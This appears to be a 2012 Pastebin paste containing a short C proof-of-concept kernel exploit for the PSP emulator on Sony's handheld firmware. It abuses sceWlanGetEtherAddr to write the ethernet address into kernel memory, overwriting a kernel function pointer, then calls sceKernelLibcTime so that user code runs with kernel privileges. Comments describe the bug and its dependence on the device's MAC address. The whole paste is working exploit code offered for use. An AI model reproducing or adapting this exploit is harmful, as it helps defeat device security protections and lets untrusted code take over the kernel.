Advertisement
Guest User

Coldbird

a guest
Oct 1st, 2012
918
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.62 KB | None | 0 0
  1. int kernel_function()
  2. {
  3. ...
  4. }
  5.  
  6. void kernel_exploit()
  7. {
  8. /* Write the ethernet address to any location. This means the exploit depends on your ethernet address. Perhaps it will not work on every model */
  9. /* This exploit is only available in kermit_wlan.prx module. On the PSP 6.60 this function is k1-checked */
  10. /* That's why "Tony" released the PSPEmu's flash0... */
  11. sceWlanGetEtherAddr(0x8800F718);
  12. sceWlanGetEtherAddr(0x8800F716);
  13. sceWlanGetEtherAddr(0x8800F714);
  14. sceWlanGetEtherAddr(0x8800F712);
  15.  
  16. sceKernelDcacheWritebackAll();
  17.  
  18. sceKernelLibcTime(0, (void *)((u32)kernel_function | 0x80000000), 0, 0, 0);
  19. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement